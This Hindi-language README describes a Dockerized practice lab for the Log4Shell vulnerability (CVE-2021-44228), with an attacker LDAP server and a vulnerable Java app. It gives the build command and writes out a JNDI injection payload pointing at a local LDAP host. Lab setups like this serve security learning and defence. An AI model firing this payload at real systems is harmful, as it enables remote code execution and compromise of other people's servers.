
# CVE-2021-44228 (Log4Shell) शोषण का सुरक्षित अभ्यास करने के लिए Dockerized लैब वातावरण। इसमें हमलावर LDAP सर्वर और कस्टम पेलोड परीक्षण के लिए कमजोर Java एप्लिकेशन शामिल है।
यह परियोजना CVE-2021-44228 (Log4Shell) के रूप में ज्ञात गंभीर Log4j भेद्यता को सुरक्षित रूप से अभ्यास करने और समझने के लिए एक डॉकराइज़्ड वातावरण प्रदान करती है।
docker compose up --build
/vulnerable/Makefile के परीक्षण अनुभाग में पेलोड को संशोधित कर सकते हैं$${jndi:ldap://127.0.0.1:10000/} का उपयोग करता है